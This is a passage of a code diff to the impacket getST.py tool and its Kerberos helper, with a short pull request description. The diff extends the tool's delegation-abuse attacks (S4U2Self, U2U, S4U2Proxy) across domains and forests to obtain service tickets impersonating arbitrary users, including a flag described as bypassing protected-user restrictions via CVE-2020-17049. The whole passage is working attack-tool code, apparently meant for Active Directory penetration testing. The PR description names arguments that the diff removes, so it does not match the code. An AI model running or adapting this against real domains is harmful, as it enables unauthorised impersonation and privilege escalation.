+                                        targetSPN, additionalTicket, False, True, nextDomain, nextKDC, noRec = True)
+            
+            else:
+
+                # For next cross-realm domain inside user's forest
+
+                # Retrieve recursively inter-realm TGT for target domain as TGT for final S4U2Proxy
+                # And last S4U2proxy krbtgt/<TargetDomain> as additional ticket for final S4U2Proxy
+
+                tgtNextDomain = tgt
+                cipherNextDomain = cipher
+                sessionKeyNextDomain = sessionKey
+                tgtAddTicket = r
+                cipherAddTicket = newCipher
+                newSessionKeyAddTicket = newSessionKey
+                tgs = decoder.decode(tgtAddTicket, asn1Spec=TGS_REP())[0]
+                additionalTicket = Ticket()
+                additionalTicket.from_asn1(tgs['ticket'])
+                
+                while True:
+
+                    logging.info(f'Requesting TGS-REQ for krbtgt/{self.__proxydomain.upper()} to {nextKDC}')
+                    tgtNextDomain, cipherNextDomain, _, sessionKeyNextDomain = getKerberosTGS(Principal(f"krbtgt/{self.__proxydomain.upper()}",
+                                                                        type = constants.PrincipalNameType.NT_SRV_INST.value),
+                                                                        nextDomain, nextKDC, tgtNextDomain, cipherNextDomain, sessionKeyNextDomain, noRec = True)
+                    
+                    tgs = decoder.decode(tgtNextDomain, asn1Spec=TGS_REP())[0]
+                    if logging.getLogger().level == logging.DEBUG:
+                        logging.debug('TGS_REP')
+                        print(tgs.prettyPrint())
+                    spn = Principal()
+                    spn.from_asn1(tgs['ticket'], 'realm', 'sname')
+                    
+                    nextDomain = spn.components[1].upper()
+
+                    if str(spn).split('@')[0].lower() == f"krbtgt/{self.__proxydomain.upper()}".lower():
+
+                        if self.__proxydc is not None:
+                            nextKDC = self.__proxydc
+                        else:
+                            nextKDC = nextDomain
+
+                        return self.doS4U2Proxy(tgtNextDomain, cipherNextDomain, sessionKeyNextDomain,
+                                                targetSPN, additionalTicket, False, False, nextDomain, nextKDC, noRec = True)
+
+                    else:
+
+                        if nextDomain.lower() == self.__proxydomain.lower() and self.__proxydc is not None:
+                            nextKDC = self.__proxydc
+                        else:
+                            nextKDC = nextDomain
+
+                        tgtAddTicket, cipherAddTicket, _, newSessionKeyAddTicket = self.doS4U2Proxy(tgtAddTicket, cipherAddTicket,
+                                                                            newSessionKeyAddTicket, f"krbtgt/{self.__proxydomain.upper()}",
+                                                                            None, False, False, nextDomain, nextKDC, noRec = True)
+                        
+                        tgs = decoder.decode(tgtAddTicket, asn1Spec=TGS_REP())[0]
+                        additionalTicket = Ticket()
+                        additionalTicket.from_asn1(tgs['ticket'])
+
+    def doS4U2Self(self, tgt, cipher, sessionKey, additionalTicket, nthash, aesKey, nextDomain, nextKDC):
+        # Extract TGT from AS-REP or TGS-REP for cross-realm request
+        
+        try:
+            decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
+        except:
+            decodedTGT = decoder.decode(tgt, asn1Spec=TGS_REP())[0]
         ticket = Ticket()
         ticket.from_asn1(decodedTGT['ticket'])
+
+        if additionalTicket != None and self.__u2u and nextDomain.lower() == self.__domain.lower():
+            logging.info(f"Using additional ticket")
 
         apReq = AP_REQ()
         apReq['pvno'] = 5
@@ -872,10 +596,10 @@ class GETST:
         # In the S4U2self KRB_TGS_REQ/KRB_TGS_REP protocol extension, a service
         # requests a service ticket to itself on behalf of a user. The user is
         # identified to the KDC by the user's name and realm.
-        clientName = Principal(self.__options.impersonate, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+        clientName = Principal(self.__impersonateuser, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
 
         S4UByteArray = struct.pack('<I', constants.PrincipalNameType.NT_PRINCIPAL.value)
-        S4UByteArray += ensure_binary(self.__options.impersonate) + ensure_binary(self.__domain) + b'Kerberos'
+        S4UByteArray += ensure_binary(self.__impersonateuser) + ensure_binary(self.__impersonatedomain.upper()) + b'Kerberos'
 
         if logging.getLogger().level == logging.DEBUG:
             logging.debug('S4UByteArray')
@@ -936,7 +660,7 @@ class GETST:
 
             paForUserEnc = PA_FOR_USER_ENC()
             seq_set(paForUserEnc, 'userName', clientName.components_to_asn1)
-            paForUserEnc['userRealm'] = self.__domain
+            paForUserEnc['userRealm'] = self.__impersonatedomain.upper()
             paForUserEnc['cksum'] = noValue
             paForUserEnc['cksum']['cksumtype'] = int(constants.ChecksumTypes.hmac_md5.value)
             paForUserEnc['cksum']['checksum'] = checkSum
@@ -961,45 +685,53 @@ class GETST:
         opts.append(constants.KDCOptions.renewable.value)
         opts.append(constants.KDCOptions.canonicalize.value)
 
-
-        if self.__options.u2u:
+        if additionalTicket != None and self.__u2u and nextDomain.lower() == self.__domain.lower(): # U2U and last S4U2Self
             opts.append(constants.KDCOptions.renewable_ok.value)
             opts.append(constants.KDCOptions.enc_tkt_in_skey.value)
 
         reqBody['kdc-options'] = constants.encodeFlags(opts)
 
-        if self.__no_s4u2proxy and self.__options.spn is not None:
+        if self.__self and self.__options.spn is not None:
             logging.info("When doing S4U2self only, argument -spn is ignored")
 
         if self.__dmsa:
             serverName = Principal('krbtgt/%s' % self.__domain, type=constants.PrincipalNameType.NT_SRV_INST.value)
             logging.debug('DMSA: Targeting krbtgt/%s service (sname)' % self.__domain)            
-        elif self.__options.u2u:
-            serverName = Principal(self.__user, self.__domain.upper(), type=constants.PrincipalNameType.NT_UNKNOWN.value)
         else:
-            serverName = Principal(self.__user, type=constants.PrincipalNameType.NT_UNKNOWN.value)
+            serverName = Principal()
+            serverName.type = constants.PrincipalNameType.NT_ENTERPRISE.value
+            serverName.components = [f"{self.__user}@{self.__domain.upper()}"]
 
         seq_set(reqBody, 'sname', serverName.components_to_asn1)
-        reqBody['realm'] = str(decodedTGT['crealm'])
+        reqBody['realm'] = nextDomain
+
+        if additionalTicket != None and self.__u2u and nextDomain.lower() == self.__domain.lower(): # U2U and last S4U2Self
+            # Add ST to additional tickets field
+            seq_set_iter(reqBody, 'additional-tickets', (additionalTicket.to_asn1(TicketAsn1()),))
 
         now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
 
         reqBody['till'] = KerberosTime.to_asn1(now)
         reqBody['nonce'] = random.getrandbits(31)
-        seq_set_iter(reqBody, 'etype',
-                     (int(cipher.enctype), int(constants.EncryptionTypes.rc4_hmac.value)))
-
-        if self.__options.u2u:
-            seq_set_iter(reqBody, 'additional-tickets', (ticket.to_asn1(TicketAsn1()),))
+        if additionalTicket != None and self.__u2u and nextDomain.lower() == self.__domain.lower(): # U2U and last S4U2Self
+            encType = additionalTicket.encrypted_part.etype
+        else:
+            encType = cipher.enctype
+        seq_set_iter(reqBody, 'etype', (tuple(dict.fromkeys((int(encType),) +
+                                                            (int(constants.EncryptionTypes.rc4_hmac.value),
+                                                            int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
+                                                            int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value))))))
 
         if logging.getLogger().level == logging.DEBUG:
             logging.debug('Final TGS')
             print(tgsReq.prettyPrint())
-
-        logging.info('Requesting S4U2self%s' % ('+U2U' if self.__options.u2u else ''))
+        
         message = encoder.encode(tgsReq)
 
-        r = sendReceive(message, self.__domain, kdcHost)
+        logging.info('Requesting S4U2self%s to %s' % ('+U2U' if additionalTicket != None \
+                                                and self.__u2u and nextDomain.lower() == self.__domain.lower() else '',
+                                                nextKDC))
+        r = sendReceive(message, nextDomain, nextKDC)
 
         tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
 
@@ -1050,14 +782,14 @@ class GETST:
                     import traceback
                     traceback.print_exc()
 
-        if self.__no_s4u2proxy:
-            return r, None, sessionKey, None
-
         if logging.getLogger().level == logging.DEBUG:
             logging.debug('TGS_REP')
             print(tgs.prettyPrint())
 
-        if self.__force_forwardable:
+        spn = Principal()
+        spn.from_asn1(tgs['ticket'], 'realm', 'sname')
+
+        if self.__force_forwardable and spn.components[0].lower() != "krbtgt":
             # Convert hashes to binary form, just in case we're receiving strings
             if isinstance(nthash, str):
                 try:
@@ -1131,103 +863,45 @@ class GETST:
             # put it back in the TGS
             tgs['ticket']['enc-part']['cipher'] = cipherText
 
-        ################################################################################
-        # Up until here was all the S4USelf stuff. Now let's start with S4U2Proxy
-        # So here I have a ST for me.. I now want a ST for another service
-        # Extract the ticket from the TGT
-        ticketTGT = Ticket()
-        ticketTGT.from_asn1(decodedTGT['ticket'])
+        # Parse TGS
 
-        # Get the service ticket
-        ticket = Ticket()
-        ticket.from_asn1(tgs['ticket'])
+        cipherText = tgs['enc-part']['cipher']
+        # Key Usage 8
+        # TGS-REP encrypted part (includes application session
+        # key), encrypted with the TGS session key (Section 5.4.2)
+        plainText = cipher.decrypt(sessionKey, 8, cipherText)
+        encTGSRepPart = decoder.decode(plainText, asn1Spec = EncTGSRepPart())[0]
+        newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'].asOctets())
+        newCipher = _enctype_table[int(encTGSRepPart['key']['keytype'])]
 
-        apReq = AP_REQ()
-        apReq['pvno'] = 5
-        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
+        # Check if we get the requested serviceName: If not this is for another KDC
 
-        opts = list()
-        apReq['ap-options'] = constants.encodeFlags(opts)
-        seq_set(apReq, 'ticket', ticketTGT.to_asn1)
+        if spn.components[0].lower() != "krbtgt":
+            return r, newCipher, sessionKey, newSessionKey
+        else:
+            nextDomain = spn.components[1].upper()
 
-        authenticator = Authenticator()
-        authenticator['authenticator-vno'] = 5
-        authenticator['crealm'] = str(decodedTGT['crealm'])
+            if nextDomain.lower() != self.__domain.lower():
 
-        clientName = Principal()
-        clientName.from_asn1(decodedTGT, 'crealm', 'cname')
+                # Send subsequent TGS-REQ with krbtgt/self.__domain until we reach the self.__domain
 
-        seq_set(authenticator, 'cname', clientName.components_to_asn1)
+                logging.info(f'Requesting TGS-REQ for krbtgt/{self.__domain.upper()} to {nextDomain}')
+                r, newCipher, oldSessionKey, newSessionKey = getKerberosTGS(Principal(f"krbtgt/{self.__domain.upper()}",
+                                                                                      type = constants.PrincipalNameType.NT_SRV_INST.value),
+                                                                                      nextDomain, nextDomain, r, newCipher, newSessionKey)
 
-        now = datetime.datetime.now(datetime.timezone.utc)
-        authenticator['cusec'] = now.microsecond
-        authenticator['ctime'] = KerberosTime.to_asn1(now)
+                spn = Principal()
+                tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+                spn.from_asn1(tgs['ticket'], 'realm', 'sname')
+                nextDomain = spn.components[1].upper()
 
-        encodedAuthenticator = encoder.encode(authenticator)
+            # Send the final S4U2Self[+U2U]
 
-        # Key Usage 7
-        # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
-        # TGS authenticator subkey), encrypted with the TGS session
-        # key (Section 5.5.1)
-        encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
-
-        apReq['authenticator'] = noValue
-        apReq['authenticator']['etype'] = cipher.enctype
-        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
-
-        encodedApReq = encoder.encode(apReq)
-
-        tgsReq = TGS_REQ()
-
-        tgsReq['pvno'] = 5
-        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
-        tgsReq['padata'] = noValue
-        tgsReq['padata'][0] = noValue
-        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
-        tgsReq['padata'][0]['padata-value'] = encodedApReq
-
-        # Add resource-based constrained delegation support
-        paPacOptions = PA_PAC_OPTIONS()
-        paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,))
-
-        tgsReq['padata'][1] = noValue
-        tgsReq['padata'][1]['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
-        tgsReq['padata'][1]['padata-value'] = encoder.encode(paPacOptions)
-
-        reqBody = seq_set(tgsReq, 'req-body')
-
-        opts = list()
-        # This specified we're doing S4U
-        opts.append(constants.KDCOptions.cname_in_addl_tkt.value)
-        opts.append(constants.KDCOptions.canonicalize.value)
-        opts.append(constants.KDCOptions.forwardable.value)
-        opts.append(constants.KDCOptions.renewable.value)
-
-        reqBody['kdc-options'] = constants.encodeFlags(opts)
-        service2 = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
-        seq_set(reqBody, 'sname', service2.components_to_asn1)
-        reqBody['realm'] = self.__domain
-
-        myTicket = ticket.to_asn1(TicketAsn1())
-        seq_set_iter(reqBody, 'additional-tickets', (myTicket,))
-
-        now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
-
-        reqBody['till'] = KerberosTime.to_asn1(now)
-        reqBody['nonce'] = random.getrandbits(31)
-        seq_set_iter(reqBody, 'etype',
-                     (
-                         int(constants.EncryptionTypes.rc4_hmac.value),
-                         int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
-                         int(constants.EncryptionTypes.des_cbc_md5.value),
-                         int(cipher.enctype)
-                     )
-                     )
-        message = encoder.encode(tgsReq)
-
-        logging.info('Requesting S4U2Proxy')
-        r = sendReceive(message, self.__domain, kdcHost)
-        return r, None, sessionKey, None
+            if self.__kdcHost is not None:
+                nextKDC = self.__kdcHost
+            else:
+                nextKDC = nextDomain
+            return self.doS4U2Self(r, newCipher, newSessionKey, additionalTicket, nthash, aesKey, nextDomain, nextKDC)
 
     def run(self):
         tgt = None
@@ -1235,15 +909,13 @@ class GETST:
         # Do we have a TGT cached?
         domain, _, TGT, _ = CCache.parseFile(self.__domain)
 
-        # ToDo: Check this TGT belogns to the right principal
+        # ToDo: Check this TGT belongs to the right principal
         if TGT is not None:
             tgt, cipher, sessionKey = TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey']
             oldSessionKey = sessionKey
             logging.debug("session key : " + str(sessionKey.contents))
             
         if tgt is None:
-            # If otherDCHost is not None, and cross-forest is false, we need to obtain a ST for krbtgt on the second domain
-             
             # Still no TGT
             userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
             logging.info('Getting TGT for user')
@@ -1252,12 +924,14 @@ class GETST:
                                                                     self.__aesKey,
                                                                     self.__kdcHost)
             logging.debug("TGT session key: %s" % hexlify(sessionKey.contents).decode())
-
-            
-
+            logging.info('Saving ticket in %s' % (self.__user + '.ccache'))
+            ccache = CCache()
+            ccache.fromTGT(tgt, oldSessionKey, oldSessionKey)
+            ccache.saveFile(self.__user + '.ccache')
 
         # Ok, we have valid TGT, let's try to get a service ticket
-        if self.__options.impersonate is None:
+        
+        if self.__options.impersonate is None: # TGS-REQ only
 
             if self.__options.renew is True:
                 logging.info("Renewing TGT")
@@ -1269,40 +943,142 @@ class GETST:
             serverName = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
             tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, self.__kdcHost, tgt, cipher, sessionKey, self.__options.renew)
             self.__saveFileName = self.__user
-        else:
-            # Here's the rock'n'roll
-            
-            # Cross domain/forest interactions
-            if (self.__otherdcHost is not None) and (self.__targetDomain is not None):
-                try:
-                    if self.__forest:
-                        tgs, cipher, oldSessionKey, sessionKey = self.doS4UCrossForest(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost, self.__otherdcHost, self.__targetDomain)
-                    else:
-                        tgs, cipher, oldSessionKey, sessionKey = self.doS4UCrossDomain(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost, self.__otherdcHost)
-                except Exception as e:
-                    print(str(e))
-            else: 
-                try:
-                    logging.info('Impersonating %s' % self.__options.impersonate)
-                    # Editing below to pass hashes for decryption
-                    if self.__additional_ticket is not None:
-                        tgs, cipher, oldSessionKey, sessionKey = self.doS4U2ProxyWithAdditionalTicket(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey,
-                                                                                                    self.__kdcHost, self.__additional_ticket)
-                    else:
-                        tgs, cipher, oldSessionKey, sessionKey = self.doS4U(tgt, cipher, oldSessionKey, sessionKey, unhexlify(self.__nthash), self.__aesKey, self.__kdcHost)
-                except Exception as e:
-                    logging.debug("Exception", exc_info=True)
-                    logging.error(str(e))
-                    if str(e).find('KDC_ERR_S_PRINCIPAL_UNKNOWN') >= 0:
-                        logging.error('Probably user %s does not have constrained delegation permisions or impersonated user does not exist' % self.__user)
-                    if str(e).find('KDC_ERR_BADOPTION') >= 0:
-                        logging.error('Probably SPN is not allowed to delegate by user %s or initial TGT not forwardable' % self.__user)
+        
+        else: # S4U
 
-                    return
+            # Here's the rock'n'roll
+            try:
+                if self.__self: # S4U2Self[+U2U] only
+
+                    # Save TGT for self.__domain for potential U2U
+                    tgtDomain = tgt
+
+                    nextDomain = self.__impersonatedomain.upper()
+
+                    if self.__impersonatedomain.lower() != self.__domain.lower():
+
+                        # We need inter-realm TGT for self.__impersonatedomain
+
+                        if self.__kdcHost is None:
+                            logging.info(f'Requesting TGS-REQ for krbtgt/{self.__impersonatedomain.upper()} to {self.__domain.upper()}')
+                        else:
+                            logging.info(f'Requesting TGS-REQ for krbtgt/{self.__impersonatedomain.upper()} to {self.__kdcHost}')
+                        tgt, cipher, oldSessionKey, sessionKey = getKerberosTGS(Principal(f"krbtgt/{self.__impersonatedomain.upper()}",
+                                                                        type = constants.PrincipalNameType.NT_SRV_INST.value),
+                                                                        self.__domain.upper(), self.__kdcHost, tgt, cipher, sessionKey)
+                        
+                    if self.__impersonatedc is not None:
+                        nextKDC = self.__impersonatedc
+                    else:
+                        nextKDC = nextDomain
+
+                    if self.__u2u:
+                        if self.__additional_ticket is None: # Provide TGT for self.__domain as additional ticket
+                            decodedASREP = decoder.decode(tgtDomain, asn1Spec = AS_REP())[0]
+                            additionalTicket = Ticket()
+                            additionalTicket.from_asn1(decodedASREP['ticket'])
+                        else: # Otherwise use the one provided
+                            ccache = CCache.loadFile(additionalTicket)
+                            creds = ccache.credentials[0]
+                            rawTicket = creds.toTGT()
+                            decodedASREP = decoder.decode(rawTicket['KDC_REP'], asn1Spec = AS_REP())[0]
+                            additionalTicket = Ticket()
+                            additionalTicket.from_asn1(decodedASREP['ticket'])
+                    else:
+                        additionalTicket = None
+
+                    tgs, cipher, oldSessionKey, sessionKey = self.doS4U2Self(tgt, cipher, sessionKey, additionalTicket, unhexlify(self.__nthash),
+                                                                             self.__aesKey, nextDomain, nextKDC)
+                
+                elif self.__proxy: # S4U2Proxy only
+
+                    if self.__additional_ticket is not None:
+                        ccache = CCache.loadFile(self.__additional_ticket)
+                        creds = ccache.credentials[0]
+                        rawTicket = creds.toTGT()
+                        decodedASREP = decoder.decode(rawTicket['KDC_REP'], asn1Spec = AS_REP())[0]
+                        additionalTicket = Ticket()
+                        additionalTicket.from_asn1(decodedASREP['ticket'])
+                    else:
+                        additionalTicket = None
+                    
+                    if self.__kdcHost is None:
+                        nextKDC = self.__domain.upper()
+                    else:
+                        nextKDC = self.__kdcHost
+
+                    tgs, cipher, oldSessionKey, sessionKey = self.doS4U2Proxy(tgt, cipher, sessionKey, self.__options.spn, additionalTicket, False,
+                                                                              self.__forest, self.__domain.upper(), nextKDC)
+                
+                else: # S4U2Self[+U2U] + S4U2Proxy
+
+                    # S4U2Self[+U2U]
+
+                    # Save TGT for self.__domain for next S4U2Proxy
+                    tgtDomain = tgt
+                    cipherDomain = cipher
+                    sessionKeyDomain = sessionKey
+
+                    nextDomain = self.__impersonatedomain.upper()
+
+                    if self.__impersonatedomain.lower() != self.__domain.lower():
+
+                        # We need inter-realm TGT for self.__impersonatedomain
+
+                        if self.__kdcHost is None:
+                            logging.info(f'Requesting TGS-REQ for krbtgt/{self.__impersonatedomain.upper()} to {self.__domain.upper()}')
+                        else:
+                            logging.info(f'Requesting TGS-REQ for krbtgt/{self.__impersonatedomain.upper()} to {self.__kdcHost}')
+                        tgt, cipher, oldSessionKey, sessionKey = getKerberosTGS(Principal(f"krbtgt/{self.__impersonatedomain.upper()}",
+                                                                        type = constants.PrincipalNameType.NT_SRV_INST.value),
+                                                                        self.__domain.upper(), self.__kdcHost, tgt, cipher, sessionKey)
+                        
+                    if self.__impersonatedc is not None:
+                        nextKDC = self.__impersonatedc
+                    else:
+                        nextKDC = nextDomain
+
+                    if self.__u2u:
+                        if self.__additional_ticket is None: # Provide TGT for self.__domain as additional ticket
+                            decodedASREP = decoder.decode(tgtDomain, asn1Spec = AS_REP())[0]
+                            additionalTicket = Ticket()
+                            additionalTicket.from_asn1(decodedASREP['ticket'])
+                        else: # Otherwise use the one provided
+                            ccache = CCache.loadFile(additionalTicket)
+                            creds = ccache.credentials[0]
+                            rawTicket = creds.toTGT()
+                            decodedASREP = decoder.decode(rawTicket['KDC_REP'], asn1Spec = AS_REP())[0]
+                            additionalTicket = Ticket()
+                            additionalTicket.from_asn1(decodedASREP['ticket'])
+                    else:
+                        additionalTicket = None
+
+                    tgs, cipher, oldSessionKey, sessionKey = self.doS4U2Self(tgt, cipher, sessionKey, additionalTicket, unhexlify(self.__nthash),
+                                                                             self.__aesKey, nextDomain, nextKDC)
+
+                    # S4U2Proxy
+
+                    decodedTGSREP = decoder.decode(tgs, asn1Spec = TGS_REP())[0]
+                    additionalTicket = Ticket()
+                    additionalTicket.from_asn1(decodedTGSREP['ticket'])
+                    
+                    if self.__kdcHost is None:
+                        nextKDC = self.__domain.upper()
+                    else:
+                        nextKDC = self.__kdcHost
+
+                    tgs, cipher, oldSessionKey, sessionKey = self.doS4U2Proxy(tgtDomain, cipherDomain, sessionKeyDomain, self.__options.spn, additionalTicket,
+                                                                              False, self.__forest, self.__domain.upper(), nextKDC)
+
+            except Exception as e:
+                print(str(e))
+                if logging.getLogger().level == logging.DEBUG:
+                    import traceback
+                    traceback.print_exc()
+                return
             self.__saveFileName = self.__options.impersonate
 
         self.saveTicket(tgs, oldSessionKey)
-
 
 if __name__ == '__main__':
     print(version.BANNER)
@@ -1311,26 +1087,27 @@ if __name__ == '__main__':
                                                                 "Service Ticket and save it as ccache")
     parser.add_argument('identity', action='store', help='[domain/]username[:password]')
     parser.add_argument('-spn', action="store", help='SPN (service/server) of the target service the '
-                                                     'service ticket will' ' be generated for')
+                                                     'service ticket will be generated for')
     parser.add_argument('-altservice', action="store", help='New sname/SPN to set in the ticket')
     parser.add_argument('-dmsa', action='store_true', help='Use DMSA (Delegated Managed Service Accounts) ')
-    parser.add_argument('-impersonate', action="store", help='target username that will be impersonated (thru S4U2Self)'
+    parser.add_argument('-impersonate', action="store", help='Target username@domain that will be impersonated (thru S4U2Self)'
                                                              ' for quering the ST. Keep in mind this will only work if '
                                                              'the identity provided in this scripts is allowed for '
                                                              'delegation to the SPN specified')
-    parser.add_argument('-additional-ticket', action='store', metavar='ticket.ccache', help='include a forwardable service ticket in a S4U2Proxy request for RBCD + KCD Kerberos only')
+    parser.add_argument('-additional-ticket', action='store', metavar='ticket.ccache', help='Additional ticket for S4U2Self or S4U2Proxy')
     parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
-    parser.add_argument('-u2u', dest='u2u', action='store_true', help='Request User-to-User ticket')
-    parser.add_argument('-self', dest='no_s4u2proxy', action='store_true', help='Only do S4U2self, no S4U2proxy')
+    parser.add_argument('-u2u', dest='u2u', action='store_true', help='Use User-to-User with S4U2Self')
+    parser.add_argument('-self', dest='self', action='store_true', help='Only do S4U2Self, no S4U2Proxy')
+    parser.add_argument('-proxy', dest='proxy', action='store_true', help='Only do S4U2Proxy, no S4U2Self')
     parser.add_argument('-force-forwardable', action='store_true', help='Force the service ticket obtained through '
                                                                         'S4U2Self to be forwardable. For best results, the -hashes and -aesKey values for the '
                                                                         'specified -identity should be provided. This allows impresonation of protected users '
                                                                         'and bypass of "Kerberos-only" constrained delegation restrictions. See CVE-2020-17049')
     parser.add_argument('-renew', action='store_true', help='Sets the RENEW ticket option to renew the TGT used for authentication. Set -spn to \'krbtgt/DOMAINFQDN\'')
+    parser.add_argument('-forest', dest='forest', action='store_true', help='Use branch-aware algorithm for cross-forest S4U2Proxy')
 
     group = parser.add_argument_group('authentication')
-
     group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
     group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
     group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
@@ -1339,11 +1116,12 @@ if __name__ == '__main__':
     group.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication '
                                                                           '(128 or 256 bits)')
     group.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller. If '
-                                                                            'omitted it use the domain part (FQDN) specified in the target parameter')
-    group.add_argument('-targetdc', action='store', metavar="ip address", help='IP Address of the second domain controller to use. Necessary '
-                                                                            'for cross-domain/forest RBCD')
-    group.add_argument('-targetdomain', action='store', metavar="ip address", help='Second domain to target. Necessary for cross-domain/forest RBCD')
-    parser.add_argument('-forest', dest='forest', action='store_true', help='For cross-forest RBCD')
+                                                                            'omitted it use the domain part (FQDN) specified in the identity parameter')
+    group.add_argument('-proxydomain', action='store', metavar="ip address", help='Domain of target SPN for S4U2proxy. Required for S4U2Proxy')
+    group.add_argument('-proxydc', action='store', metavar="ip address", help='IP Address of the domain controller of target SPN for S4U2Proxy. '
+                                                                                'Otherwise domain from -proxydomain will be used')
+    group.add_argument('-impersonatedc', action='store', metavar="ip address", help='IP Address of the domain controller of impersonate user\'s domain for S4U2Self. '
+                                                                                    'Otherwise domain from -impersonate will be used')
 
     if len(sys.argv) == 1:
         parser.print_help()
@@ -1354,20 +1132,22 @@ if __name__ == '__main__':
 
     options = parser.parse_args()
 
-    if not options.no_s4u2proxy and options.spn is None:
-        parser.error("argument -spn is required, except when -self is set")
+    if options.self and options.proxy:
+        parser.error("arguments -self and -proxy provided, do not set them for full S4U2Self + S4U2Proxy")
+    else:
+        if options.self:
+            if options.impersonate is None:
+                parser.error("argument -impersonate is required when doing S4U2Self")
+            if options.altservice is not None:
+                if '/' not in options.altservice:
+                    parser.error("When doing S4U2Self only, substitution service must include service class AND name (i.e. CLASS/HOSTNAME@REALM, or CLASS/HOSTNAME)")
+        else:
+            if options.spn is None:
+                parser.error("argument -spn is required, except when -self is set")
+            if options.impersonate is not None and options.proxydomain is None:
+                parser.error("argument -proxydomain required")
 
-    if options.no_s4u2proxy and options.impersonate is None:
-        parser.error("argument -impersonate is required when doing S4U2self")
-
-    if options.no_s4u2proxy and options.altservice is not None:
-        if '/' not in options.altservice:
-            parser.error("When doing S4U2self only, substitution service must include service class AND name (i.e. CLASS/HOSTNAME@REALM, or CLASS/HOSTNAME)")
-
-    if options.additional_ticket is not None and options.impersonate is None:
-        parser.error("argument -impersonate is required when doing S4U2proxy")
-
-    if options.u2u is not None and (options.no_s4u2proxy is None and options.impersonate is None):
+    if options.u2u is True and (options.self is False and options.impersonate is None):
         parser.error("-u2u is not implemented yet without being combined to S4U. Can't obtain a plain User-to-User ticket")
         # implementing plain u2u would need to modify the getKerberosTGS() function and add a switch
         # in case of u2u, the proper flags should be added in the request, as well as a proper S_PRINCIPAL structure with the domain being set in order to target a UPN

--- a/impacket/krb5/kerberosv5.py
+++ b/impacket/krb5/kerberosv5.py
@@ -366,7 +366,7 @@ def getKerberosTGT(clientName, password, domain, lmhash, nthash, aesKey='', kdcH
 
     return tgt, cipher, key, sessionKey
 
-def getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey, renew = False):
+def getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey, renew = False, noRec = False):
 
     # Decode the TGT
     try:
@@ -477,13 +477,13 @@ def getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey, renew =
     spn = Principal()
     spn.from_asn1(res['ticket'], 'realm', 'sname')
 
-    if spn.components[0] == serverName.components[0]:
+    if str(spn).split('@')[0].lower() == str(serverName).split('@')[0].lower() or noRec:
         # Yes.. bye bye
         return r, cipher, sessionKey, newSessionKey
     else:
         # Let's extract the Ticket, change the domain and keep asking
         domain = spn.components[1]
-        return getKerberosTGS(serverName, domain, kdcHost, r, cipher, newSessionKey)
+        return getKerberosTGS(serverName, domain, None, r, cipher, newSessionKey)
 
 ################################################################################
 # DCE RPC Helpers


### PR DESCRIPTION
Added cross-domain & cross-forest RBCD support for getST.py
Cross-domain RBCD can be performed with arguments similar to Rubeus:
- `-targetdc `
- `-targetdomain`
- `-forest` (in case of cross-forest RBCD)
See : https://www.synacktiv.com/en/publications/exploring-cross-domain-cross-forest-rbcd